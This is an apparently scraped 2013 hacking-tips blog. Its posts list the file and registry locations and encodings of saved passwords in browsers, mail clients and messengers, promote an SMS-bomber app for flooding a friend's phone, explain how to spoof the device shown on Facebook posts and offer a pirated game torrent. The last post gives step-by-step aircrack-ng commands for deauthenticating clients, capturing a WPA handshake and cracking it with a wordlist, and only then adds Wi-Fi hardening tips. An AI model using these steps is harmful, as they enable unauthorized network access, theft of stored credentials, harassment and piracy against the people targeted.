Follow us on Facebook

Saturday, 7 December 2013

All Saved Password Location

Posted by yu

Google Chrome:

Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location


XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default


Trillian:

Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently.

Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) – C:\Program Files\Trillian\users\

XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere there.

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal



MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[AccountName]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. They a set of Win API functions (Credential API’s) to store its’ security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the “target name” and “type”. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.



Paltalk:

Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]



Google Talk:

Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]



Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.



Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(”EOptions string” value)



Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.



AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords



Filezilla:

Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this



Internet Explorer 4.00 – 6.00:

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.

You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.



Internet Explorer 7.00 – 8.00:

The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.



Opera:

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile



Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 98/2000:


Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[ProfileName]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.



ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.



Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

 

Read More
This is a Sticky post

This will appear right below the first post. You can edit this right from the template and change it to your own post. This will appear right below the first post. You can edit this right from the template and change it to your own post.This will appear right below the first post. You can edit this right from the template and change it to your own post.

Sunday, 1 December 2013

Prank Your Facebook Friends Using Zalgo Text Generator Tool

Posted by yu

Prank Your Facebook Friends Using Zalgo Text Generator Tool

  How will you feel when you see something scary on Facebook statuses? or something that looks like if is a bug on Facebook? Well, here i gonna share something exactly matching that same thing that will prank your Facebook friend by posting something scary/grungy text effect called zalgo text. I will provide you a link of zalgo text generator below that will allow you to generate amazing scary text that you can easily post on Facebook status even you can directly paste into Facebook chat
 


if you wanna see live demo about how exactly this working and looks like then you have a look at thisprophet hacker ‘s facebook fan page post. So, if you like this amazing effect and want to post it on Facebook to prank your friends then below are full steps for getting this effect.

Step 1


 Step 2

There you will see text generator tool like below :



Step 3

Now, just write something that you like on first box and your new scary zalgo text will be generated in the other box right on it’s side.

Step 4

 Also you have some more option that you can configure in order to make your text effect more outstanding and look more scary, so check those too.

 Step 5

now you have to copy the text and then you can easily paste and post on your facebook timeline as statues update or into your facebook chat.
Read More

Tuesday, 26 November 2013

How to Change Windows 7 Boot Screen Animation

Posted by Unknown
Hey friends are you tired from watching your old window boot screen animation . Now , I  tell
you can you give your window a Funky cool new window boot screen animation . It is very simple
to add some animation ,We use a software called Windows 7 Boot Updater.     This software makes it possible to change boot animation,as well as text background.

The application works by modifying the BOOTMGR system file. Since the application is in beta version and modifies certain critical system files it is always recommended to backup before using it. Though in our testing we found that the application worked well on a Windows 7 x64 SP1 system without any problems

Steps to change boot animation:

Step 1:

Download  Windows 7 Boot Updater  and open it.

Step 2:
Run the application and load boot screen file (.bs7).
Step 3:
Check that you have loaded correct boot screen using using play. Click ‘Apply’ to to change the boot screen.


Selected boot screens for Windows 7

There are many skin in internet but few are best.


1.Radian boot screen


 Download


2.Window Progress counter


Download

3.Need for Speed



Download
Read More

Update Facebook status via any device

Posted by Unknown


 I don't have an iPhone 5 but i can still update my fb status via iPhone 5.

 We are not a millionaire so we don't have a list of smart devices .But you think like a hacker
you can do it .
 You can show of your friend that you have a smart device ,in your fb status show via a device.When your friends see your fb status they were shocked.
Now you can update status via difference devices ranging from android phone to iPhone . From now on, no need to feel upset when your friend updates status from his expensive gadgets.

CREATING A FACEBOOK APP 

  1. Go to this link Facebook Developers
  2. Create your account if you don't have
  3. Click on Apps (The last option of the top menu beside search bar)
  4. Now click on Create New App
  5. Now if you want to post your status with iPhone then type iphone in place of App Name
  6. Click on continue
  7. Now it will ask you to enter captcha. Just enter the captcha and move ahead

  1. 1. Fill the display name (If you want to update your status with iphone then type iphone).   
  2. Enter an app domain and site url (If you don't have domain then enter what I have entered in this app) 
  3.  Sandbox mode must be disabled. 
  4. Copy the App ID 
    Save changes.
Now you will see the basic settings of the app. See the image below

POSTING STATUS ON FACEBOOK WITH YOUR APP

  1. Copy one from these URLs 
  2. Paste your App ID which you have copied in the red marked area.
  3. Now your URL will be like

    https://m.facebook.com/dialog/feed?app_id=429297103855432<place your app id>&redirect_uri=https%3A%2F%2Fwww.facebook.com&to&display=touch
    Open the URL with your browser and post your status.

    PRE CREATED URLs

    You find more precreated app id at this site of various devices.

    Fbstatusvia 

     

     


Read More

Thursday, 21 November 2013

NEED FOR SPEED MOST WANTED

Posted by Unknown

NEED FOR SPEED MOST WANTED

Friends Here I Giving You NEED FOR SPEED MOST WANTED For PC This Is Ripped Or Compressed Hope You Like It 





NFS Most Wanted was a bang from NFS with extreme graphics and superb gameplay. The game comes with new features like destructable platforms , full customization , city roam and the best part POLICE CHASE. This game gives the most amazing car racing experience.

System Requirements

CPU:3 Ghz or faster
RAM:Atleast 1 GB
VGA:Atleast an NVidia 5900 or ATi 9800 with 256mb of video memory
DX:DirectX 9.0c
OS:Windows XP
HDD:3 GB or more free space
Sound:DirectX 9.0c compatible
Resolution:1280x1024
ODD:DVD reader
Network:Multiplayer requires 1 set of discs per PC and a broadband (Cable, DSL or faster) connection. Internet or LAN (2-4 players)
Recommended peripheral:Keyboard, Mouse or Steering Wheel/Gamepad
Note:System Requirements for full detail level on 1280x1024 Note: You might be able to play on full detail level and 1280x1024 with slightly lower requirements.

Description

Need for Speed Most wanted

Minimum system requirements: Intel Pentium 4 (or equivalent) CPU running at 1.4GHz or higher, 256MB RAM, 32MB DirectX 9.0c compatible video card (Geforce2 MX or higher)*, DirectX compatible sound card, 3 GB of HD space, 8X CD-ROM

* The following major D3D chipsets are supported: ATI Radeon 7500, 8500, 9xxx series, Xpress 200, X300, X600, X700, X800 series, NVIDIA GeForce 2 (GTS, MX, Ultra/Ti), GeForce 3 (Ti), GeForce 4 (MX, Ti), GeForce FX series, GeForce 6200, 6600, 6800, 7800, Intel 950/i915g, S3 GammaChrome S18 Pro.

Instructions

1. Extract all the 4 parts
2. Run .7z File
3. Just run the game icon
4. Enjoy

Works 100%.....Guaranteed

No need for crack or keygen


TO DOWNLOAD THIS GAME YOU HAVE TO INSTALL BIT TORRENT TO YOUR PC
DOWNLOAD LINK IS BELOW


Read More

Tuesday, 19 November 2013

SMS Bombing

Posted by Unknown
   Now days you wanna Kick-ass your friend .So this app is ready for it   

 SMS Bomber

 An SMS bomber is exactly what it sounds like. It is similar to an email bomber except it spams with different things ie SMS's instead of emails. SMS bombers are a lot more trouble than email bombers because they can be used to target phones
  Bomb your friends with alot of SMS in a short period 



Features

  • - Unlimit number of text
  • - Flood multiple contacts
  • - Cancel button
  • - No delay or periodically send
  • - Remember last config
  • - Easily select contacts
  • - Counter to make sms differently
  • - Add counter to (press menu/Counter) into each text 

Download 



Anti SMS Bomber


Anti SMS Bomber helps you prevent repeated message from any sender. Turn it on and stay safe.

Features:

- Block duplicated sms from any sender
- See log messages
- Fix empty message bug
- Show notification when being bombed
Read More

How To Hack Wi-Fi WPA/WPA2 Password & Secure your Wi-Fi

Posted by Unknown
 Warning:::::::Don't hack any  authorized wifi otherwise you go to jail.

Hack Wifi

 Tools

  • Compatible Wifi Card (Optional) 

Rules to follow 

1.Now you First install a Vmware   in your system.
2. Then you create a virtual machine in your Vmware.



3.Then power on your machine.
4.And  Now your all set to go...just simply follow below steps...now 




Steps to Follow 

    •  airmon-ng

    The result will be something like :


    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]
     

    • airmon-ng start wlan0 

    •  (Optional) Change the mac address of the mon0 interface.

    • ifconfig mon0 down

      macchanger -m 00:11:22:33:44:55 mon0
      ifconfig mon0 up

       

    • airodump-ng mon0

      Then, press "
      Ctrl+c" to break the program.
    •  airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID
    This terminal is keeping running.open another terminal.


    • aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

      *where -a is the BSSID
                 -c is the client MAC address (STATION)
      Wait for the handshake 
      Use the John the Ripper as word list to crack the WPA/WP2 password                              aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
    • You can  use your own password wordlist.  

       Secure your wifi  

      1.  Choice encrypt

      A simple matter . WEP can be cracked in a few minutes, and WPA is relatively weaker than WPA2 . Choose WPA2 .
      No WEP, not WPA . End of story .
      WPA2 networks can only attack dictionary attacks , so ...

      2.  Setting a strong password

      WPA2 forces us to use at least 8 character password , which in itself is good , but each character increases security exponentially , that is, with each a pool of all possible to generate passwords of this length greatly increases. So it really makes a difference whether you use a password of 8 or a 9 characters.

      3. Change the default network name ( SSID)

      You have to remember to never leave the default network name , such as " Netgear " and " Asus " . Attackers often carry with them so . rainbow tables , so that breaking WPA/WPA2 password for the network with the same name takes just a few minutes. ( This is explained in detail in the operation of WPA/WPA2 )
      If a list of the vein , or as the SSID you set a random string of characters (not recommended ) , crackers utrudnicie life.
      4. Change the password to the router

      Suppose that someone has hacked into your network. Most at 192.168.1.1 ( or similar ) is the router control panel where you can do anything : change the password for your network , change the name , disable it , and more.
      Very often, the router itself is protected by a username and password (admin , admin ) , which is not a big obstacle for burglars . Also keep in mind to change the defaults wherever possible.

      5. Limiting coverage

      Most WiFi intrusions followed by " outsiders" . The neighborhood wireless network card detects a lot of potential victims , most of the apartments around us or from nearby buildings.
      WiFi network coverage should be chosen so as to cover the whole house , but nothing else. This will prevent any unwanted shares . Frequently in the options you can set the router transmitter power .

      6. Filtering MAC / hide the SSID

      All the networks are saying not to use the above . techniques , as they are very easy to break. It is of course true, but ... why not hinder life crackers ? :)
      By the way, when we go on vacation and forget to turn off the router and the network is empty there in the ether , hiding the SSID and MAC address filtering is a not - for - workaround. We can not podszpiegować who logs on to the network and change your MAC address on him, because no one logs on to the network. Likewise, we can not use the attack revoke credentials to check a hidden network name , because it is who perform the attack .

       



Read More